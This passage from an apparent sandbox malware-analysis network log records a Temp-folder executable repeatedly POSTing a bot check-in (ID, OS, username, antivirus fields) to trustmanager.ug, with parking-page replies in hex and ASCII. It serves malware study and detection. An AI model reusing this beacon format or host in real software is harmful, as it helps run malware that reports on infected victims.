0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:08:58.096430063 CEST	12532	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.3	49756	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:58.240982056 CEST	12667	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:08:58.267081022 CEST	12854	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:08:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:08:58.267098904 CEST	12854	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.3	49757	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:58.419560909 CEST	15375	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:08:58.445729971 CEST	15376	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:08:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:08:58.445749044 CEST	15377	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.3	49758	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:58.581275940 CEST	15381	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:08:58.607223988 CEST	15382	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:08:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:08:58.607258081 CEST	15383	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.3	49760	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:58.766827106 CEST	15384	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:08:58.792680025 CEST	15391	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:08:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 